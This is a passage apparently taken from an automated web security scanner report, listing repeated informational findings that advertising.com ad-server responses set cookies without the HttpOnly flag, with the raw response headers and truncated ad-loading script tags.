C2=vYk+NFJwHob0Fs6sIWwJoagjtKPCC0nRfJpwEg02FdMBdbdRHTwihX0xEwjmGdMBxGeRHTAQva0xEQW4FdMBLppRHTQghX0xEgN5FdMB6ijRHTAmhX0xEAY4FdMBdDmRHTA/ya0xEAVZGdMBYimRHTA3Wa0xEQY4FdMBFGeRHTAxBa0xEU1aGdMBbTeRHTQwBa0xEYnXGdMBWGoRHTgQva0xEogmGdMBxmpRHTQRga0xE0soGdMB8mpRHHZAmZOiGpZj0jw+NXActiGA8Moxl7a+AcsmGXuAEOphCbLuBoKuGr/smJwokaowzClALRqhCXaxAMdPGYwrQQwdIawh; domain=advertising.com; expires=Sat, 15-Jun-2013 18:06:39 GMT; path=/
F1=B8iR63EBAAAABAAAAoAAOCA; domain=advertising.com; expires=Sat, 15-Jun-2013 18:06:39 GMT; path=/
BASE=x7Q9Ui23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jx9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQH!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:06:39 GMT; path=/
ROLL=U6APHjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/keP!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:06:39 GMT; path=/
58502192=_4dfa462f,7842678840,768034^981604^1183^0,0_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.981604.768034.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Thu, 16 Jun 2011 18:06:39 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 667
Date: Thu, 16 Jun 2011 18:06:39 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: C2=vYk+NFJwHob0Fs6sIWwJoagjtKPCC0nRfJpwEg02FdMBdbdRHTwihX0xEwjmGdMBxGeRHTAQva0xEQW4FdMBLppRHTQghX0xEgN5FdMB6ijRHTAmhX0xEAY4FdMBdDmRHTA/ya0xEAVZGdMBYimRHTA3Wa0xEQY4FdMBFGeRHTAxBa0xEU1aGdMBbTeRHTQwBa0xEYnXGdMBWGoRHTgQva0xEogmGdMBxmpRHTQRga0xE0soGdMB8mpRHHZAmZOiGpZj0jw+NXActiGA8Moxl7a+AcsmGXuAEOphCbLuBoKuGr/smJwokaowzClALRqhCXaxAMdPGYwrQQwdIawh; domain=advertising.com; expires=Sat, 15-Jun-2013 18:06:39 GMT; path=/
Set-Cookie: F1=B8iR63EBAAAABAAAAoAAOCA; domain=advertising.com; expires=Sat, 15-Jun-2013 18:06:39 GMT; path=/
Set-Cookie: BASE=x7Q9Ui23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jx9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQH!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:06:39 GMT; path=/
Set-Cookie: ROLL=U6APHjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/keP!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:06:39 GMT; path=/
Set-Cookie: 58502192=_4dfa462f,7842678840,768034^981604^1183^0,0_; domain=advertising.com; path=/click

document.write('<script language="JavaScript" type="text/javascript" src="http://view.atdmt.com/TLC/jview/242390407/direct/01?click=http://r1-ads.ace.advertising.com/click/site=0000768034/mnum=0000981
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=768034/size=728090/u=2/bnum=63972603/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

C2=Unk+NFJwHob0Fp6sIWwJoaUjtKPCC0nheJpwEg02FaMBdbdhGTwihXoxEwjmGaMBxGehGTAQvaoxEQW4FaMBLpphGTQghXoxEgN5FaMB6ijhGTAmhXoxEAY4FaMBdDmhGTA/yaoxEAVZGaMBYimhGTA3WaoxEQY4FaMBFGehGTAxBaoxEU1aGaMBbTehGTQwBaoxEYnXGaMBWGohGTgQvaoxEogmGaMBxmphGTQRgaoxE0soGaMB8mphGHZAmZOiGmZj0jw+NX0btiGA8MoBl7a+AcsmGUuAEOpxBbLuBoKuGo/smJwokacwzClALRqxBXaxAMdPGVwrQQwdIakhq62ApVmBwD; domain=advertising.com; expires=Sat, 15-Jun-2013 18:22:12 GMT; path=/
F1=BQdS63EBAAAABAAAA4AAICA; domain=advertising.com; expires=Sat, 15-Jun-2013 18:22:12 GMT; path=/
BASE=x7Q9Xi23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixfE!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:22:12 GMT; path=/
ROLL=U6APLjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2ewWp6Dkc9UB0fhTcL!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:22:12 GMT; path=/
63972603=_4dfa49d4,3485571020,768034^960484^1183^0,0_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.960484.768034.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Thu, 16 Jun 2011 18:22:12 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 550
Date: Thu, 16 Jun 2011 18:22:12 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: C2=Unk+NFJwHob0Fp6sIWwJoaUjtKPCC0nheJpwEg02FaMBdbdhGTwihXoxEwjmGaMBxGehGTAQvaoxEQW4FaMBLpphGTQghXoxEgN5FaMB6ijhGTAmhXoxEAY4FaMBdDmhGTA/yaoxEAVZGaMBYimhGTA3WaoxEQY4FaMBFGehGTAxBaoxEU1aGaMBbTehGTQwBaoxEYnXGaMBWGohGTgQvaoxEogmGaMBxmphGTQRgaoxE0soGaMB8mphGHZAmZOiGmZj0jw+NX0btiGA8MoBl7a+AcsmGUuAEOpxBbLuBoKuGo/smJwokacwzClALRqxBXaxAMdPGVwrQQwdIakhq62ApVmBwD; domain=advertising.com; expires=Sat, 15-Jun-2013 18:22:12 GMT; path=/
Set-Cookie: F1=BQdS63EBAAAABAAAA4AAICA; domain=advertising.com; expires=Sat, 15-Jun-2013 18:22:12 GMT; path=/
Set-Cookie: BASE=x7Q9Xi23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixfE!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:22:12 GMT; path=/
Set-Cookie: ROLL=U6APLjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2ewWp6Dkc9UB0fhTcL!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:22:12 GMT; path=/
Set-Cookie: 63972603=_4dfa49d4,3485571020,768034^960484^1183^0,0_; domain=advertising.com; path=/click

document.write('<script type="text/javascript" src="http://adfarm.mediaplex.com/ad/js/9608-119290-2042-5?mpt=3485571020&mpvc=http://r1-ads.ace.advertising.com/click/site=0000768034/mnum=0000960484/cst
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=768034/size=728090/u=2/bnum=66502577/hr=14/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

C2=HTl+NFJwHob0Fg6sIWwJoawitKPCC0nRcJpwEg02FRMBdbdRETwihXExEwjmGRMBxGeRETAQvaExEQW4FRMBLppRETQghXExEgN5FRMB6ijRETAmhXExEAY4FRMBdDmRETA/yaExEAVZGRMBYimRETA3WaExEQY4FRMBFGeRETAxBaExEU1aGRMBbTeRETQwBaExEYnXGRMBWGoRETgQvaExEogmGRMBxmpRETQRgaExE0soGRMB8mpREHZAmZOiGdZj0jw+NXQbtiGA8Moxi7a+AcsmGLuAEOph/aLuBoKuGf/smJwoka4vzClALRqh/WaxAMdPGMwrQQwdIaAhq62ApVmxtTqHIUbNG3WtrCQIzasIwOICM/oBvdr0IwKvGAH; domain=advertising.com; expires=Sat, 15-Jun-2013 19:08:55 GMT; path=/
F1=BcMV63EBAAAABAAAAsBA2BA; domain=advertising.com; expires=Sat, 15-Jun-2013 19:08:55 GMT; path=/
BASE=x7Q9ki23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixf0OXuHQy3nGGuhGrOkUxjdUyksh8ICJaK3qk5Kdse5YdLmQk/tY7KQgKe5GmLixINBY7uyr5mZqiQCHOlSr37nk7zuuytsX+/P5PEEVdwP!; domain=advertising.com; expires=Sat, 15-Jun-2013 19:08:55 GMT; path=/
ROLL=U6APUjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2ewWp6Dkc9UB0fhTc7MO3Ile9a4XCLZ9d3J03tHf2is4HpOTQpM6s5GotpW7CQ8JMfjkHZFUlOy7ezWe0kEmjAGnCzv+jvvGKndKOIZB/g+cLdnWpKPi7sVuHG!; domain=advertising.com; expires=Sat, 15-Jun-2013 19:08:55 GMT; path=/
66502577=_4dfa54c7,8658162855,768034^1029516^1183^0,0_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1029516.768034.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Thu, 16 Jun 2011 19:08:55 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 620
Date: Thu, 16 Jun 2011 19:08:55 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: C2=HTl+NFJwHob0Fg6sIWwJoawitKPCC0nRcJpwEg02FRMBdbdRETwihXExEwjmGRMBxGeRETAQvaExEQW4FRMBLppRETQghXExEgN5FRMB6ijRETAmhXExEAY4FRMBdDmRETA/yaExEAVZGRMBYimRETA3WaExEQY4FRMBFGeRETAxBaExEU1aGRMBbTeRETQwBaExEYnXGRMBWGoRETgQvaExEogmGRMBxmpRETQRgaExE0soGRMB8mpREHZAmZOiGdZj0jw+NXQbtiGA8Moxi7a+AcsmGLuAEOph/aLuBoKuGf/smJwoka4vzClALRqh/WaxAMdPGMwrQQwdIaAhq62ApVmxtTqHIUbNG3WtrCQIzasIwOICM/oBvdr0IwKvGAH; domain=advertising.com; expires=Sat, 15-Jun-2013 19:08:55 GMT; path=/
Set-Cookie: F1=BcMV63EBAAAABAAAAsBA2BA; domain=advertising.com; expires=Sat, 15-Jun-2013 19:08:55 GMT; path=/
Set-Cookie: BASE=x7Q9ki23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixf0OXuHQy3nGGuhGrOkUxjdUyksh8ICJaK3qk5Kdse5YdLmQk/tY7KQgKe5GmLixINBY7uyr5mZqiQCHOlSr37nk7zuuytsX+/P5PEEVdwP!; domain=advertising.com; expires=Sat, 15-Jun-2013 19:08:55 GMT; path=/
Set-Cookie: ROLL=U6APUjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2ewWp6Dkc9UB0fhTc7MO3Ile9a4XCLZ9d3J03tHf2is4HpOTQpM6s5GotpW7CQ8JMfjkHZFUlOy7ezWe0kEmjAGnCzv+jvvGKndKOIZB/g+cLdnWpKPi7sVuHG!; domain=advertising.com; expires=Sat, 15-Jun-2013 19:08:55 GMT; path=/
Set-Cookie: 66502577=_4dfa54c7,8658162855,768034^1029516^1183^0,0_; domain=advertising.com; path=/click

document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N1558.126262.AOLPERFORMANCENETWO/B5584755.3;sz=728x90;pc=[TPAS_ID];click=http://r1-ads.ace.advertising.com/click/s
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=768034/size=728090/u=2/bnum=77103321/hr=14/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

C2=QOl+NFJwHob0Fh6sIWwJoa0itKPCC0nhcJpwEg02FSMBdbdhETwihXIxEwjmGSMBxGehETAQvaIxEQW4FSMBLpphETQghXIxEgN5FSMB6ijhETAmhXIxEAY4FSMBdDmhETA/yaIxEAVZGSMBYimhETA3WaIxEQY4FSMBFGehETAxBaIxEU1aGSMBbTehETQwBaIxEYnXGSMBWGohETgQvaIxEogmGSMBxmphETQRgaIxE0soGSMB8mphEHZAmZOiGeZj0jw+NXUbtiGA8MoBj7a+AcsmGMuAEOpx/aLuBoKuGg/smJwoka8vzClALRqx/WaxAMdPGNwrQQwdIaEhq62ApVmBuTqHIUbNG4WtrCQIzawIwOICM/oRvdr0IwKvG+G; domain=advertising.com; expires=Sat, 15-Jun-2013 19:03:44 GMT; path=/
F1=BA5U63EBAAAABAAAAkBA4BA; domain=advertising.com; expires=Sat, 15-Jun-2013 19:03:44 GMT; path=/
BASE=x7Q9ii23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixf0OXuHQy3nGGuhGrOkUxjdUyksh8ICJaK3qk5Kdse5YdLmQk/tY7KQgKe5GmLixINBY7uyr5mZqiQCHOlSr37nk7zO!; domain=advertising.com; expires=Sat, 15-Jun-2013 19:03:44 GMT; path=/
ROLL=U6APWjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2ewWp6Dkc9UB0fhTc7MO3Ile9a4XCLZ9d3J03tHf2is4HpOTQpM6s5GotpW7CQ8JMfjkHZFUlOy7ezWe0kEmjAGnCzv+jvvGKndKOIZB/A!; domain=advertising.com; expires=Sat, 15-Jun-2013 19:03:44 GMT; path=/
77103321=_4dfa5390,3637355511,768034^903753^1183^0,0_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.903753.768034.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Thu, 16 Jun 2011 19:03:44 GMT
Content-Type: application/x-javascript; charset=utf-8
Vary: Accept-Encoding
Date: Thu, 16 Jun 2011 19:03:44 GMT
Content-Length: 1051
Connection: close
Set-Cookie: C2=QOl+NFJwHob0Fh6sIWwJoa0itKPCC0nhcJpwEg02FSMBdbdhETwihXIxEwjmGSMBxGehETAQvaIxEQW4FSMBLpphETQghXIxEgN5FSMB6ijhETAmhXIxEAY4FSMBdDmhETA/yaIxEAVZGSMBYimhETA3WaIxEQY4FSMBFGehETAxBaIxEU1aGSMBbTehETQwBaIxEYnXGSMBWGohETgQvaIxEogmGSMBxmphETQRgaIxE0soGSMB8mphEHZAmZOiGeZj0jw+NXUbtiGA8MoBj7a+AcsmGMuAEOpx/aLuBoKuGg/smJwoka8vzClALRqx/WaxAMdPGNwrQQwdIaEhq62ApVmBuTqHIUbNG4WtrCQIzawIwOICM/oRvdr0IwKvG+G; domain=advertising.com; expires=Sat, 15-Jun-2013 19:03:44 GMT; path=/
Set-Cookie: F1=BA5U63EBAAAABAAAAkBA4BA; domain=advertising.com; expires=Sat, 15-Jun-2013 19:03:44 GMT; path=/
Set-Cookie: BASE=x7Q9ii23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixf0OXuHQy3nGGuhGrOkUxjdUyksh8ICJaK3qk5Kdse5YdLmQk/tY7KQgKe5GmLixINBY7uyr5mZqiQCHOlSr37nk7zO!; domain=advertising.com; expires=Sat, 15-Jun-2013 19:03:44 GMT; path=/
Set-Cookie: ROLL=U6APWjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2ewWp6Dkc9UB0fhTc7MO3Ile9a4XCLZ9d3J03tHf2is4HpOTQpM6s5GotpW7CQ8JMfjkHZFUlOy7ezWe0kEmjAGnCzv+jvvGKndKOIZB/A!; domain=advertising.com; expires=Sat, 15-Jun-2013 19:03:44 GMT; path=/
Set-Cookie: 77103321=_4dfa5390,3637355511,768034^903753^1183^0,0_; domain=advertising.com; path=/click

document.write('<iframe src="http://view.atdmt.com/AAS/iview/260696261/direct;wi.728;hi.90/01/3637355511?click=http://r1-ads.ace.advertising.com/click/site=0000768034/mnum=0000903753/cstr=77103321=_4d
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=768034/size=728090/u=2/bnum=83819639/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

C2=u6k+NFJwHob0Fl6sIWwJoaEjtKPCC0nhdJpwEg02FWMBdbdhFTwihXYxEwjmGWMBxGehFTAQvaYxEQW4FWMBLpphFTQghXYxEgN5FWMB6ijhFTAmhXYxEAY4FWMBdDmhFTA/yaYxEAVZGWMBYimhFTA3WaYxEQY4FWMBFGehFTAxBaYxEU1aGWMBbTehFTQwBaYxEYnXGWMBWGohFTgQvaYxEogmGWMBxmphFTQRgaYxE0soGWMB8mphFHZAmZOiGiZj0jw+NXkbtiGA8MoBk7a+AcsmGQuAEOpxAbLuBoKuGk/smJwokaMwzClALRqxAXaxAMdPGRwrQQwdIaUhq62ApVmBvTqHIUbNG8G; domain=advertising.com; expires=Sat, 15-Jun-2013 18:42:54 GMT; path=/
F1=B4qT63EBAAAABAAAAMBAACA; domain=advertising.com; expires=Sat, 15-Jun-2013 18:42:54 GMT; path=/
BASE=x7Q9ci23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixf0OXuHQy3nGGuhGrOkUxjdUyksh8ICJaK3EQRKdseJ!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:42:54 GMT; path=/
ROLL=U6APMjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2ewWp6Dkc9UB0fhTc7MO3Ile9a4XCLZ9d3J03tHf2is4HpOTQpiOE5GotJ!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:42:54 GMT; path=/
83819639=_4dfa4eae,6403574311,768034^994447^1183^0,0_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.994447.768034.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Thu, 16 Jun 2011 18:42:54 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 602
Date: Thu, 16 Jun 2011 18:42:54 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: C2=u6k+NFJwHob0Fl6sIWwJoaEjtKPCC0nhdJpwEg02FWMBdbdhFTwihXYxEwjmGWMBxGehFTAQvaYxEQW4FWMBLpphFTQghXYxEgN5FWMB6ijhFTAmhXYxEAY4FWMBdDmhFTA/yaYxEAVZGWMBYimhFTA3WaYxEQY4FWMBFGehFTAxBaYxEU1aGWMBbTehFTQwBaYxEYnXGWMBWGohFTgQvaYxEogmGWMBxmphFTQRgaYxE0soGWMB8mphFHZAmZOiGiZj0jw+NXkbtiGA8MoBk7a+AcsmGQuAEOpxAbLuBoKuGk/smJwokaMwzClALRqxAXaxAMdPGRwrQQwdIaUhq62ApVmBvTqHIUbNG8G; domain=advertising.com; expires=Sat, 15-Jun-2013 18:42:54 GMT; path=/
Set-Cookie: F1=B4qT63EBAAAABAAAAMBAACA; domain=advertising.com; expires=Sat, 15-Jun-2013 18:42:54 GMT; path=/
Set-Cookie: BASE=x7Q9ci23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixf0OXuHQy3nGGuhGrOkUxjdUyksh8ICJaK3EQRKdseJ!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:42:54 GMT; path=/
Set-Cookie: ROLL=U6APMjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2ewWp6Dkc9UB0fhTc7MO3Ile9a4XCLZ9d3J03tHf2is4HpOTQpiOE5GotJ!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:42:54 GMT; path=/
Set-Cookie: 83819639=_4dfa4eae,6403574311,768034^994447^1183^0,0_; domain=advertising.com; path=/click

document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N6333.272756.AOL-ADVERTISING/B5305142.3;sz=728x90;click=http://r1-ads.ace.advertising.com/click/site=0000768034/mn
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=768034/size=728090/u=2/bnum=83891309/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

C2=3Tk+NFJwHob0Ft6sIWwJoakjtKPCC0nhfJpwEg02FeMBdbdhHTwihX4xEwjmGeMBxGehHTAQva4xEQW4FeMBLpphHTQghX4xEgN5FeMB6ijhHTAmhX4xEAY4FeMBdDmhHTA/ya4xEAVZGeMBYimhHTA3Wa4xEQY4FeMBFGehHTAxBa4xEU1aGeMBbTehHTQwBa4xEYnXGeMBWGohHTgQva4xEogmGeMBxmphHTQRga4xE0soGeMB8mphHHZAmZOiGqZj0jw+NXActiGA8MoBm7a+AcsmGYuAEOpxCbLuBoKuGs/smJwokaswzClALRqxCXaxAMdPGZwrQQwdIa0h; domain=advertising.com; expires=Sat, 15-Jun-2013 18:01:27 GMT; path=/
F1=BcPR63EBAAAABAAAAkAAQCA; domain=advertising.com; expires=Sat, 15-Jun-2013 18:01:27 GMT; path=/
BASE=x7Q9Ti23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jx9fCFhyHZGl9Opr8TEX1wJA3zrmHH!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:01:27 GMT; path=/
ROLL=U6APGjemptEW07uaB4l2FnxkoJDmaLFkisFCNJJ!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:01:27 GMT; path=/
83891309=_4dfa44f7,5772552350,768034^981604^1183^0,0_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.981604.768034.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Thu, 16 Jun 2011 18:01:27 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 667
Date: Thu, 16 Jun 2011 18:01:27 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: C2=3Tk+NFJwHob0Ft6sIWwJoakjtKPCC0nhfJpwEg02FeMBdbdhHTwihX4xEwjmGeMBxGehHTAQva4xEQW4FeMBLpphHTQghX4xEgN5FeMB6ijhHTAmhX4xEAY4FeMBdDmhHTA/ya4xEAVZGeMBYimhHTA3Wa4xEQY4FeMBFGehHTAxBa4xEU1aGeMBbTehHTQwBa4xEYnXGeMBWGohHTgQva4xEogmGeMBxmphHTQRga4xE0soGeMB8mphHHZAmZOiGqZj0jw+NXActiGA8MoBm7a+AcsmGYuAEOpxCbLuBoKuGs/smJwokaswzClALRqxCXaxAMdPGZwrQQwdIa0h; domain=advertising.com; expires=Sat, 15-Jun-2013 18:01:27 GMT; path=/
Set-Cookie: F1=BcPR63EBAAAABAAAAkAAQCA; domain=advertising.com; expires=Sat, 15-Jun-2013 18:01:27 GMT; path=/
Set-Cookie: BASE=x7Q9Ti23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jx9fCFhyHZGl9Opr8TEX1wJA3zrmHH!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:01:27 GMT; path=/
Set-Cookie: ROLL=U6APGjemptEW07uaB4l2FnxkoJDmaLFkisFCNJJ!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:01:27 GMT; path=/
Set-Cookie: 83891309=_4dfa44f7,5772552350,768034^981604^1183^0,0_; domain=advertising.com; path=/click

